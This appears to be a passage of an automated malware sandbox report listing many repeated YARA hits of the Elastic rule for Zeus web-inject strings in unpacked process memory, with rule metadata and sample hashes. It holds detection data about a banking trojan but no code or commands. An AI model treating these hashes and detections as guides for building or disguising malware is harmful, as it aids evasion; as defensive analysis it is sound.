Source: 2.3.svchost.exe.2d30000.39.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.NcYLgtXIKJgHj.exe.bd2000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.31.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 10.2.NcYLgtXIKJgHj.exe.14c2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 14.2.NcYLgtXIKJgHj.exe.2922000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.NcYLgtXIKJgHj.exe.27f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.62.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.NcYLgtXIKJgHj.exe.bd2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bpfz752pYZ.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.5450000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.NcYLgtXIKJgHj.exe.5e2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.NcYLgtXIKJgHj.exe.2d12000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 34.2.NcYLgtXIKJgHj.exe.2740000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.17.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.45.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 20.2.NcYLgtXIKJgHj.exe.27d0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bpfz752pYZ.exe.406400.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 10.2.NcYLgtXIKJgHj.exe.1520000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bpfz752pYZ.exe.407000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.52.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.52.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.60.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.NcYLgtXIKJgHj.exe.2792000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.54.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 14.2.NcYLgtXIKJgHj.exe.2ac0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29a2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.46.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.51.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.Bpfz752pYZ.exe.6f31c8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.NcYLgtXIKJgHj.exe.2f50000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
